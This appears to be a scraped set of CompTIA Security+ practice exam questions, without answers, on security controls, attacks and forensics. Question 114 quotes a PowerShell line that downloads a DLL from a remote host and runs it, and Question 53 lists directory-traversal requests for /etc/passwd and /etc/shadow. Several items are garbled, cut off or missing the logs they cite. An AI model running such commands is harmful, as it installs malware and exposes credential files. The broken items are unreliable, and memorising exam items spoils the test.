
SY0-601 CompTIA Security+ Exam 2021 Questions and Answers

Questions 4

A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites, whether the employee is in the office or away. Which of the following solutions should the CISO implement?

Options:

A.

VAF

B.

SWG

C.

VPN

D.

WDS

Questions 5

A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network. Which of the following should the company implement?

Options:

A.

PEAP

B.

PSK

C.

WPA3

D.

WPS

Questions 6

A financial institution recently joined a bug bounty program to identify security issues in the institution's new public platform. Which of the following best describes who the institution is working with to identify security issues?

Options:

A.

Script kiddie

B.

Insider threats

C.

Malicious actor

D.

Authorized hacker

Questions 7

Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?

Options:

A.

Weak configurations

B.

Integration activities

C.

Unsecure user accounts

D.

Outsourced code development

Questions 8

Which of the following types of controls is a turnstile?

Options:

A.

Physical

B.

Detective

C.

Corrective

D.

Technical

Questions 9

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Questions 10

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Questions 11

A data owner has been tasked with assigning proper data classifications and destruction methods for various types of data contained within the environment.

Options:

Questions 12

A company receives a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company most likely complying with?

Options:

A.

NIST CSF

B.

GDPR

C.

PCI DSS

D.

ISO 27001

Questions 13

A major manufacturing company updated its internal infrastructure and just started to allow OAuth applications to access corporate data. Data leakage is being reported. Which of the following most likely caused the issue?

Options:

A.

Privilege creep

B.

Unmodified default

C.

TLS

D.

Improper patch management

Questions 14

The concept of connecting a user account across the systems of multiple enterprises is best known as:

Options:

A.

federation

B.

a remote access policy.

C.

multifactor authentication

D.

single sign-on.

Questions 15

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation.

C.

Utilize email content filtering.

D.

Isolate the infected attachment.

Questions 16

A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following best describes this type of attack?

Options:

A.

Reconnaissance

B.

Impersonation

C.

Typosquatting

D.

Watering-hole

Questions 17

Which of the following is the correct order of volatility from most to least volatile?

Options:

A.

Memory, temporary filesystems, routing tables, disk, network storage

B.

Cache, memory, temporary filesystems, disk, archival media

C.

Memory, disk, temporary filesystems, cache, archival media

D.

Cache, disk, temporary filesystems, network storage, archival media

Questions 18

A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user MOST likely experiencing?

Options:

A.

Bluejacking

B.

Jamming

C.

Rogue access point

D.

Evil twin

Questions 19

Which of the following should be addressed first on security devices before connecting to the network?

Options:

A.

Open permissions

B.

Default settings

C.

API integration configuration

D.

Weak encryption

Questions 20

Several users have been violating corporate security policy by accessing inappropriate sites on corporate-issued mobile devices while off campus. The senior leadership team wants all mobile devices to be hardened with controls that:

  • Limit the sites that can be accessed

  • Only allow access to internal resources while physically on campus.

  • Restrict employees from downloading images from company email

Which of the following controls would best address this situation? (Select two).

Options:

A.

MFA

B.

GPS tagging

C.

Biometric authentication

D.

Content management

E.

Geofencing

F.

Screen lock and PIN requirements

Questions 21

A user's login credentials were recently compromised. During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password. However, the trusted website does not use a pop-up for entering user credentials. Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SQL injection

C.

DNS poisoning

D.

Certificate forgery

Questions 22

During an assessment, a systems administrator found several hosts running FTP and decided to immediately block FTP communications at the firewall. Which of the following describes the greatest risk associated with using FTP?

Options:

A.

Private data can be leaked

B.

FTP is prohibited by internal policy.

C.

Users can upload personal files

D.

Credentials are sent in cleartext.

Questions 23

Which of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Questions 24

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the most likely cause of this issue?

Options:

A.

An external access point is engaging in an evil twin attack

B.

The signal on the WAP needs to be increased in that section of the building

C.

The certificates have expired on the devices and need to be reinstalled

D.

The users in that section of the building are on a VLAN that is being blocked by the firewall

Questions 25

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

Options:

A.

SaaS

B.

PaaS

C.

IaaS

D.

DaaS

Questions 26

Law enforcement officials sent a company a notification that states electronically stored information and paper documents cannot be destroyed. Which of the following explains this process?

Options:

A.

Data breach notification

B.

Accountability

C.

Legal hold

D.

Chain of custody

Questions 27

Which of the following best ensures minimal downtime for organizations with critical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Questions 28

An organization's corporate offices were destroyed due to a natural disaster, so the organization is now setting up offices in a temporary work space. Which of the following will the organization most likely consult?

Options:

A.

The business continuity plan

B.

The risk management plan

C.

The communication plan

D.

The incident response plan

Questions 29

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommend?

Options:

A.

A content filter

B.

A WAF

C.

A next-generation firewall

D.

An IDS

Questions 30

A malicious actor recently penetrated a company's network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

Options:

A.

Security

B.

Application

C.

Dump

D.

Syslog

Questions 31

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Questions 32

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Questions 33

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Questions 34

A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Options:

A.

Someone near the building is jamming the signal

B.

A user has set up a rogue access point near the building

C.

Someone set up an evil twin access point in the affected area.

D.

The APs in the affected area have been unplugged from the network

Questions 35

A company wants the ability to restrict web access and monitor the websites that employees visit. Which of the following would best meet these requirements?

Options:

A.

Internet Proxy

B.

VPN

C.

WAF

D.

Firewall

Questions 36

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Questions 37

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

Options:

A.

SMIME

B.

LDAPS

C.

SSH

D.

SRTP

Questions 38

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any

B.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any

C.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any

D.

[Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any

Questions 39

A security analyst discovers that a company's username and password database were posted on an internet forum. The usernames and passwords are stored in plaintext. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

Options:

A.

Create DLP controls that prevent documents from leaving the network.

B.

Implement salting and hashing.

C.

Configure the web content filter to block access to the forum.

D.

Increase password complexity requirements.

Questions 40

A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows. Which of the following is MOST likely the cause of the malware infection?

Options:

A.

Open permissions

B.

Improper or weak patch management

C.

Unsecure root accounts

D.

Default settings

Questions 41

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards.

Questions 42

Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)

• Hostname: ws01

• Domain: comptia.org

• IPv4: 10.1.9.50

• IPv4: 10.2.10.50

• Root: home.aspx

• DNS CNAME:homesite.

Instructions:

Drag the various data points to the correct locations within the CSR. Extension criteria belong in the left-hand column and values belong in the corresponding row in the right-hand column.

Options:

Questions 43

A security engineer is investigating a penetration test report that states the company website is vulnerable to a web application attack. While checking the web logs from the time of the test, the engineer notices several invalid web form submissions using an unusual address: "SELECT * FROM customername". Which of the following is most likely being attempted?

Options:

A.

Directory traversal

B.

SQL injection

C.

Privilege escalation

D.

Cross-site scripting

Questions 44

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

Options:

A.

nmap

B.

tracert

C.

ping

D.

ssh

Questions 45

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

Options:

A.

An external security assessment

B.

A bug bounty program

C.

A tabletop exercise

D.

A red-team engagement

Questions 46

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

Options:

A.

GDPR

B.

ISO

C.

NIST

D.

PCI DSS

Questions 47

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C.

HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D.

HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Questions 48

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider implementing?

Options:

A.

DLP

B.

VPC

C.

CASB

D.

Content filtering

Questions 49

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Questions 50

A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?

Options:

A.

A worm is propagating across the network.

B.

Data is being exfiltrated.

C.

A logic bomb is deleting data.

D.

Ransomware is encrypting files.

Questions 51

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

Options:

A.

Warm site

B.

Generator

C.

Hot site

D.

Cold site

E.

Cloud backups

F.

UPS

Questions 52

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would best meet this need?

Options:

A.

Community

B.

Private

C.

Public

D.

Hybrid

Questions 53

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

http://company.com/get.php?f=/etc/passwd

http://company.com/..%2F..%2F..%2F..%2Fetc%2Fshadow

http://company.com/../../../../etc/passwd

Which of the following best describes the type of attack?

Options:

A.

SQLi

B.

CSRF

C.

API attacks

D.

Directory traversal

Questions 54

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two).

Options:

A.

Geolocation

B.

Time-of-day restrictions

C.

Certificates

D.

Tokens

E.

Geotagging

F.

Role-based access controls

Questions 55

A security administrator recently used an internal CA to issue a certificate to a public application. A user tries to reach the application but receives a message stating, "Your connection is not private." Which of the following is the best way to fix this issue?

Options:

A.

Ignore the warning and continue to use the application normally.

B.

Install the certificate on each endpoint that needs to use the application.

C.

Send the new certificate to the users to install on their browsers.

D.

Send a CSR to a known CA and install the signed certificate on the application's server.

Questions 56

A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicloud provider environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control and management regardless of the data location. Which of the following would best meet the architect's objectives?

Options:

A.

Trusted Platform Module

B.

IaaS

C.

HSMaaS

D.

PaaS

Questions 57

A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the best remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy MFA

C.

Utilize a WAF

D.

Configure HIPS

Questions 58

A large financial services firm recently released information regarding a security breach within its corporate network that began several years before. During the time frame in which the breach occurred, indicators show an attacker gained administrative access to the network through a file downloaded from a social media site and subsequently installed it without the user's knowledge. Since the compromise, the attacker was able to take command and control of the computer systems anonymously while obtaining sensitive corporate and personal employee information. Which of the following methods did the attacker most likely use to gain access?

Options:

A.

A bot

B.

A fileless virus

C.

A logic bomb

D.

A RAT

Questions 59

The IT department's on-site developer has been with the team for many years. Each time an application is released, the security team is able to identify multiple vulnerabilities. Which of the following would best help the team ensure the application is ready to be released to production?

Options:

A.

Limit the use of third-party libraries.

B.

Prevent data exposure queries.

C.

Obfuscate the source code

D.

Submit the application to QA before releasing it.

Questions 60

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor most likely be required to review and sign?

Options:

A.

SLA

B.

NDA

C.

MOU

D.

AUP

Questions 61

Which of the following teams combines both offensive and defensive testing techniques to protect an organization's critical systems?

Options:

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Questions 62

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Questions 63

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Questions 64

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Questions 65

Which of the following can best protect against an employee inadvertently installing malware on a company system?

Options:

A.

Host-based firewall

B.

System isolation

C.

Least privilege

D.

Application allow list

Questions 66

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Questions 67

A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices. Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Questions 68

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

Using a SHA-2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Questions 69

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Questions 70

Which of the following security design features can an development team to analyze the deletion eoting Of data sets the copy?

Options:

A.

Stored procedures

B.

Code reuse

C.

Version control

D.

Continuous

Questions 71

An analyst is working on an investigation with multiple alerts for multiple hosts. The hosts are showing signs of being compromised by a fast-spreading worm. Which of the following should be the next step in order to stop the spread?

Options:

A.

Disconnect every host from the network.

B.

Run an AV scan on the entire

C.

Scan the hosts that show signs of

D.

Place all known-infected hosts on an isolated network

Questions 72

You are a security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the infection and then identify whether each remaining host is clean or infected.

Options:

Questions 73

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Questions 74

A security analyst discovers several JPG photos from a cellular phone during a forensics investigation involving a compromised system. The analyst runs a forensics tool to gather file metadata. Which of the following would be part of the images if all the metadata is still intact?

Options:

A.

The GPS location

B.

When the file was deleted

C.

The total number of print jobs

D.

The number of copies made

Questions 75

During a recent penetration test, a tester plugged a laptop into an Ethernet port in an unoccupied conference room and obtained a valid IP address. Which of the following would have best prevented this avenue of attack?

Options:

A.

Enabling MAC address filtering

B.

Moving printers inside a firewall

C.

Implementing 802.1X

D.

Using network port security

Questions 76

During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst?

Options:

A.

A vulnerability scanner

B.

A NGFW

C.

The Windows Event Viewer

D.

A SIEM

Questions 77

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Questions 78

A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

Options:

A.

An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack

B.

An attacker was able to bypass the application approved list by emailing a spreadsheet attachment with an embedded PowerShell in the file.

C.

An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook

D.

An attacker was able to phish user credentials successfully from an Outlook user profile

Questions 79

A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The company will compensate researchers based on the vulnerabilities discovered. Which of the following best describes the program the company is setting up?

Options:

A.

Open-source intelligence

B.

Bug bounty

C.

Red team

D.

Penetration testing

Questions 80

An organization is concerned that its hosted web servers are not running the most updated version of the software. Which of the following would work best to help identify potential vulnerabilities?

Options:

A.

hping3 -S comptia.org -p 80

B.

nc -l -v comptia.org -p 80

C.

nmap comptia.org -p 80 -sV

D.

nslookup -port=80 comptia.org

Questions 81

Recent changes to a company's BYOD policy require all personal mobile devices to use a two-factor authentication method that is not something you know or have. Which of the following will meet this requirement?

Options:

A.

Facial recognition

B.

Six-digit PIN

C.

PKI certificate

D.

Smart card

Questions 82

A well-known organization has been experiencing attacks from APTs. The organization is concerned that custom malware is being created and emailed into the company or installed on USB sticks that are dropped in parking lots. Which of the following is the best defense against this scenario?

Options:

A.

Configuring signature-based antivirus to update every 30 minutes

B.

Enforcing S/MIME for email and automatically encrypting USB drives upon insertion

C.

Implementing application execution in a sandbox for unknown software

D.

Fuzzing new files for vulnerabilities if they are not digitally signed

Questions 83

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works best until a proper fix is released?

Options:

A.

Detective

B.

Compensating

C.

Deterrent

D.

Corrective

Questions 84

A threat actor used a sophisticated attack to breach a well-known ride-sharing company. The threat actor posted on social media that this action was in response to the company's treatment of its drivers. Which of the following best describes this type of threat actor?

Options:

A.

Nation-state

B.

Hacktivist

C.

Organized crime

D.

Shadow IT

Questions 85

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Questions 86

A help desk technician receives a phone call from someone claiming to be a part of the organization's cybersecurity incident response team. The caller asks the technician to verify the network's internal firewall IP address. Which of the following is the technician's best course of action?

Options:

A.

Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.

B.

Ask for the caller's name, verify the person's identity in the email directory, and provide the requested information over the phone.

C.

Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization's cybersecurity officer.

D.

Request the caller send an email for identity verification and provide the requested information via email to the caller.

Questions 87

The most recent vulnerability scan flagged the domain controller with a critical vulnerability. The systems administrator researched the vulnerability and discovered the domain controller does not run the associated application with the vulnerability. Which of the following steps should the administrator take next?

Options:

A.

Ensure the scan engine is configured correctly.

B.

Apply a patch to the domain controller.

C.

Research the CVE.

D.

Document this as a false positive.

Questions 88

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company's website. The malicious actor posted an entry in an attempt to trick users into clicking the following:

Which of the following was most likely observed?

Options:

A.

DLL injection

B.

Session replay

C.

SQLi

D.

XSS

Questions 89

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET http://yourbank.com/transfer.do?acctnum=08764 6959 &amount=500000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646958 &amount=5000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=-087646958 &amount=1000000 HTTP/1.1

GET http://yourbank.com/transfer.do?acctnum=087646953 &amount=500 HTTP/1.1

Which of the following types of attacks is most likely being conducted?

Options:

A.

SQLi

B.

CSRF

C.

Spear phishing

D.

API

Questions 90

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

Options:

A.

data controller

B.

data owner.

C.

data custodian.

D.

data processor

Questions 91

Historically, a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result, the threat of malware incidents is almost constant. Which of the following would best help prevent the malware from being installed on the computers?

Options:

A.

AUP

B.

NGFW

C.

DLP

D.

EDR

Questions 92

A security administrator is trying to determine whether a server is vulnerable to a range of attacks. After using a tool, the administrator obtains the following output:

Which of the following attacks was successfully implemented based on the output?

Options:

A.

Memory leak

B.

Race condition

C.

SQL injection

D.

Directory traversal

Questions 93

Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this best represent?

Options:

A.

Functional testing

B.

Stored procedures

C.

Elasticity

D.

Continuous Integration

Questions 94

An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG, WAF, MDM, HIPS, and CASB systems. Which of the following is the best way to improve the situation?

Options:

A.

Remove expensive systems that generate few alerts.

B.

Modify the systems to alert only on critical issues.

C.

Utilize a SIEM to centralize logs and dashboards.

D.

Implement a new syslog/NetFlow appliance.

Questions 95

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

Which of the following can the security analyst conclude?

Options:

A.

A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Questions 96

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request in an email that has an executive's name in the display field of the email

B.

Employees who open an email attachment receive messages demanding payment in order to access files

C.

A service desk employee receives an email from the HR director asking for log-in credentials to a cloud administrator account

D.

An employee receives an email with a link to a phishing site that is designed to look like the company's email portal.

Questions 97

A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output:

Which of the following best describes the attack that is currently in progress?

Options:

A.

MAC flooding

B.

Evil twin

C.

ARP poisoning

D.

DHCP spoofing

Questions 98

A security engineer updated an application on company workstations. The application was running before the update, but it is no longer launching successfully. Which of the following most likely needs to be updated?

Options:

A.

Blocklist

B.

Deny list

C.

Quarantine list

D.

Approved list

Questions 99

An organization recently completed a security control assessment. The organization determined some controls did not meet the existing security measures. Additional mitigations are needed to lessen the risk of the non-compliant controls. Which of the following best describes these mitigations?

Options:

A.

Corrective

B.

Compensating

C.

Deterrent

D.

Technical

Questions 100

A company recently upgraded its authentication infrastructure and now has more computing power. Which of the following should the company consider using to ensure user credentials are being transmitted and stored more securely?

Options:

A.

Blockchain

B.

Salting

C.

Quantum

D.

Digital signature

Questions 101

Security engineers are working on digital certificate management with the top priority of making administration easier. Which of the following certificates is the best option?

Options:

A.

User

B.

Wildcard

C.

Self-signed

D.

Root

Questions 102

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Questions 103

A company needs to enhance its ability to maintain a scalable cloud infrastructure. The infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following cloud concepts would BEST meet these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Questions 104

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Questions 105

Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

AUP

Questions 106

A user is trying unsuccessfully to send images via SMS. The user downloaded the images from a corporate email account on a work phone. Which of the following policies is preventing the user from completing this action?

Options:

A.

Application management

B.

Content management

C.

Containerization

D.

Full disk encryption

Questions 107

A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team. Which of the following approaches would be most effective for the manager to use to address this issue?

Options:

A.

Tune the accuracy of fuzz testing.

B.

Invest in secure coding training and application security guidelines.

C.

Increase the frequency of dynamic code scans to detect issues faster.

D.

Implement code signing to make code immutable.

Questions 108

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Questions 109

A backup operator wants to perform a backup to enhance the RTO and RPO in a highly time- and storage-efficient way that has no impact on production systems. Which of the following backup types should the operator use?

Options:

A.

Tape

B.

Full

C.

Image

D.

Snapshot

Questions 110

A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

INSTRUCTIONS

Click on each firewall to do the following:

1. Deny cleartext web traffic

2. Ensure secure management protocols are used.

3. Resolve issues at the DR site.

The ruleset order cannot be modified due to outside constraints.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Questions 111

While reviewing the /etc/shadow file, a security administrator notices files with the same values. Which of the following attacks should the administrator be concerned about?

Options:

A.

Plaintext

B.

Birthday

C.

Brute-force

D.

Rainbow table

Questions 112

A security administrator is managing administrative access to sensitive systems with the following requirements:

• Common login accounts must not be used for administrative duties.

• Administrative accounts must be temporal in nature.

• Each administrative account must be assigned to one specific user.

• Accounts must have complex passwords.

• Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

Options:

A.

ABAC

B.

SAML

C.

PAM

D.

CASB

Questions 113

A company recently completed the transition from data centers to the cloud. Which of the following solutions will best enable the company to detect security threats in applications that run in isolated environments within the cloud environment?

Options:

A.

Security groups

B.

Container security

C.

Virtual networks

D.

Segmentation

Questions 114

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A PowerShell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Questions 115

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Questions 116

A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

Options:

A.

Soft token

B.

Smart card

C.

CSR

D.

SSH key

Questions 117

During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Questions 118

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who is investigating the incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

